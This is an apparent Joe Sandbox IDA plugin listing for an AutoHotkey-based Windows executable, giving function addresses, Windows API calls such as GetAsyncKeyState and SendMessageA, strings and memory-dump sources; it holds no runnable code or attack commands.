Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000000,00000000), ref: 004666D0

SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C

Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511

Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22

SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462

Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880

Strings

Can't create control., xrefs: 0045E6CA
msctls_trackbar32, xrefs: 0045EEB8

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004888B8, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50

APIs

TlsFree.KERNEL32(0000001A,00488CE1,?,00487C07), ref: 004888E3
RtlDeleteCriticalSection.NTDLL(00000000), ref: 00489614

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

RtlDeleteCriticalSection.NTDLL(0000001A), ref: 0048963E

Strings

[J, xrefs: 0048962B
CH, xrefs: 004888C9
[J, xrefs: 00489601

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00414090, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50

APIs

__Stoull.NTSTC_LIBCMT ref: 004140C8

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

Strings

Play, xrefs: 00414093
Input, xrefs: 004140C2
ThenEvent, xrefs: 004140DB
Event, xrefs: 004140AC
ThenPlay, xrefs: 004140ED

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004013E1, Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardtime

APIs

Part of subcall function 00463460: PostMessageA.USER32(?,00000414,2AF80007,00000000), ref: 00463476

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

Part of subcall function 00463400: ShowWindow.USER32(?,00000000), ref: 0046340A

Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D

Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6EA
Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6FB
Part of subcall function 0040C660: Sleep.KERNEL32(00000000), ref: 0040C7AB

Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
Part of subcall function 0040A3F0: GetTickCount.KERNEL32 ref: 0040A53A
Part of subcall function 0040A3F0: PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00402EC0: GetTickCount.KERNEL32(00402D03,?,?,?,?,?,?), ref: 00402EC0

Part of subcall function 004030C0: joyGetPosEx.WINMM ref: 004030EF

Part of subcall function 00402F00: GetTickCount.KERNEL32(?,0000000A), ref: 00402F83
Part of subcall function 00402F00: _strncpy.LIBCMT ref: 00402FF3

SetTimer.USER32(000601DA,00000009,0000000A), ref: 0040144A
GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040146F

Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2

GetMessageA.USER32(?,00000000,00000000,-00000311), ref: 004014B6
GetTickCount.KERNEL32 ref: 004014C1
GetFocus.USER32 ref: 0040155B

Part of subcall function 004764E0: GetWindowLongA.USER32(?,000000F0), ref: 004764F4
Part of subcall function 004764E0: GetParent.USER32(?), ref: 00476504
Part of subcall function 004764E0: GetWindowLongA.USER32(00000000,000000F0), ref: 0047650F

ShowWindow.USER32(000601DA,00000000), ref: 00401B84

Part of subcall function 0045A160: GetWindowLongA.USER32(00000000,000000F0), ref: 0045A1A0
Part of subcall function 0045A160: GetParent.USER32(00000000), ref: 0045A1AA

TranslateAccelerator.USER32(00000000,?,?), ref: 004015A1

Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012BC
Part of subcall function 004012B0: GetParent.USER32(00000000), ref: 004012C7
Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012D4

Part of subcall function 00466F60: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00466F7A
Part of subcall function 00466F60: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00466FB2
Part of subcall function 00466F60: SendMessageA.USER32(?,0000130C,-00000001,00000000), ref: 00466FF6
Part of subcall function 00466F60: GetDlgCtrlID.USER32 ref: 00467012
Part of subcall function 00466F60: PostMessageA.USER32(?,00000414,?,00000000), ref: 0046708A

GetKeyState.USER32(00000011), ref: 004018EA
GetWindowLongA.USER32(?,000000F0), ref: 00401912
GetKeyState.USER32(00000010), ref: 00401954
GetKeyState.USER32(00000011), ref: 004019C0
GetKeyState.USER32(000000A5), ref: 004019D5
SendMessageA.USER32(?,000000C2,00000001,0049881C), ref: 00401A1F
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00401A3C
SendMessageA.USER32(00000000,00001116,00000000,00000000), ref: 00401A79
SendMessageA.USER32(00000000,00001116,00000001,00000000), ref: 00401A93
IsDialogMessage.USER32(?,?), ref: 00401AE3
KillTimer.USER32(000601DA,00000009), ref: 00401C52
GetForegroundWindow.USER32 ref: 00401CEB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401CFE
GetClassNameA.USER32(00000000,?,00000020), ref: 00401D1B
IsDialogMessage.USER32(00000000,?), ref: 00401D5A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 00401D76
DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 00401EA8
DragFinish.SHELL32(?), ref: 00401EC3
GetTickCount.KERNEL32 ref: 00402122
DragFinish.SHELL32(00000000), ref: 004021C9
DragFinish.SHELL32(00000000), ref: 004021FA
GetTickCount.KERNEL32 ref: 0040225B
GetTickCount.KERNEL32 ref: 00402275
_strncpy.LIBCMT ref: 00402293
_strncpy.LIBCMT ref: 004022B2
_strncpy.LIBCMT ref: 00402317

Part of subcall function 004034E0: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
Part of subcall function 004034E0: GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7

GetTickCount.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402343
TranslateAccelerator.USER32(000601DA,0024027F,?), ref: 00402D3F
TranslateMessage.USER32(?), ref: 00402D68
DispatchMessageA.USER32(?), ref: 00402D73

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00453FE0, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 350

APIs

Part of subcall function 00493552: FindMITargetTypeInstance.LIBCMT ref: 0049360D
Part of subcall function 00493552: FindVITargetTypeInstance.LIBCMT ref: 00493614
Part of subcall function 00493552: PMDtoOffset.LIBCMT ref: 00493626
Part of subcall function 00493552: std::bad_exception::bad_exception.LIBCMT ref: 00493650

CLSIDFromString.OLE32(0049E27C,?), ref: 00454194
CLSIDFromString.OLE32(0049E27C,?), ref: 00454200

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EF9E
Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EFD1

CLSIDFromString.OLE32(0049E27C,?), ref: 0045439D

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E

Strings

gI, xrefs: 00454062
gI, xrefs: 00454067

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004530E0, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 347

APIs

Part of subcall function 00493552: FindMITargetTypeInstance.LIBCMT ref: 0049360D
Part of subcall function 00493552: FindVITargetTypeInstance.LIBCMT ref: 00493614
Part of subcall function 00493552: PMDtoOffset.LIBCMT ref: 00493626
Part of subcall function 00493552: std::bad_exception::bad_exception.LIBCMT ref: 00493650

Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EF9E
Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EFD1

CLSIDFromString.OLE32(0049E27C,?), ref: 004533F5
GetActiveObject.OLEAUT32(?,00000000,?), ref: 00453443

Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F

Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00453A90: SysStringLen.OLEAUT32(?), ref: 00453C21
Part of subcall function 00453A90: SysFreeString.OLEAUT32(?), ref: 00453C47
Part of subcall function 00453A90: StringFromGUID2.OLE32(?,?,00000100), ref: 00453C91
Part of subcall function 00453A90: _strncpy.LIBCMT ref: 00453CCC

Strings

gI, xrefs: 00453311
gI, xrefs: 00453316
ComObjType, xrefs: 00453346

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0044C610, Relevance: 9.1, APIs: 6, Instructions: 55window

APIs

SendMessageA.USER32(?,0000110A), ref: 0044C61F
SendMessageA.USER32(?,0000110A,00000004), ref: 0044C637
SendMessageA.USER32(?,0000110A,00000001), ref: 0044C646
SendMessageA.USER32(?,0000110A,00000003), ref: 0044C655
SendMessageA.USER32(?,0000110A,00000001,00000000), ref: 0044C669
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0044C678

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040C660, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129sleep

APIs

CharUpperA.USER32(?), ref: 0040C6EA
CharUpperA.USER32(?), ref: 0040C6FB
Sleep.KERNEL32(00000000), ref: 0040C7AB

Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040D510
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D5C2
Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0040D5F8
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D618
Part of subcall function 0040D4E0: GetCurrentThreadId.KERNEL32 ref: 0040D64F
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040D688
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040D696
Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040D6F2
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
Part of subcall function 0040D4E0: GetKeyboardLayout.USER32(00000000), ref: 0040D708
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D757
Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040D893
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D8E1
Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D930
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA37
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA4B
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA84
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DB33
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBA2
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBBC
Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DEC9
Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DF18
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DF44
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DFC0
Part of subcall function 0040D4E0: PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
Part of subcall function 0040D4E0: __itow.LIBCMT ref: 0040E021
Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040E31E
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040E400
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040E411
Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B1
Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B9
Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E4ED
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040E559
Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E57E
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E585

Strings

%s%c, xrefs: 0040C744
{Raw}, xrefs: 0040C735, 0040C743

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00433FF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93thread

APIs

Part of subcall function 00441960: GetForegroundWindow.USER32 ref: 00441987
Part of subcall function 00441960: IsWindowVisible.USER32(00000000), ref: 004419A2

GetWindowThreadProcessId.USER32 ref: 0043403D
GetGUIThreadInfo.USER32(00000000), ref: 00434044
GetClassNameA.USER32(00000030,?,000000FC), ref: 00434067
EnumChildWindows.USER32(00000000,00434140,?), ref: 00434089

Part of subcall function 004719E0: _vswprintf_s.LIBCMT ref: 00471A13

Strings

0, xrefs: 00434035

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004424D0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92

APIs

__itow.LIBCMT ref: 00442582

Strings

UTF-16, xrefs: 004424FB
UTF-8, xrefs: 00442539
UTF-16-RAW, xrefs: 004425D2
UTF-8-RAW, xrefs: 004425A5

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00439490, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86registry

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\AutoHotkey,00000000,00000000,?,00000000,?,?,?), ref: 004394BA
RegQueryValueExA.ADVAPI32 ref: 004394E6
RegCloseKey.ADVAPI32(00000000), ref: 004394F3

Strings

SOFTWARE\AutoHotkey, xrefs: 004394B0
InstallDir, xrefs: 004394D8

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00451D20, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451D37
GetFileAttributesA.KERNEL32(?), ref: 00451D65
RemoveDirectoryA.KERNEL32(?), ref: 00451D8C
SHFileOperation.SHELL32 ref: 00451DE6

Strings

\, xrefs: 00451D53

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004145F0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68

APIs

__Stoull.NTSTC_LIBCMT ref: 00414670

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

Strings

UTF-16, xrefs: 00414636
UTF-8, xrefs: 00414604
UTF-16-RAW, xrefs: 0041464F
UTF-8-RAW, xrefs: 0041461D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00476550, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42timewindowlibrary

APIs

GetModuleHandleA.KERNEL32(user32,IsHungAppWindow,?,004755DA), ref: 00476576
GetProcAddress.KERNEL32(00000000,?,004755DA), ref: 0047657D
SendMessageTimeoutA.USER32(00000000,00000000,00000000,00000000,00000002,00001388,00000000), ref: 004765AF

Strings

user32, xrefs: 00476571
IsHungAppWindow, xrefs: 0047656C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00408BC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35

APIs

CloseHandle.KERNEL32(00000000), ref: 00408BD3
CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd,?,001BC918,?,0040D550), ref: 00408BDE
GetLastError.KERNEL32 ref: 00408BE6
CloseHandle.KERNEL32(00000000), ref: 00408C0D

Strings

AHK Keybd, xrefs: 00408BD5

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00473B50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25library

APIs

LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C

Strings

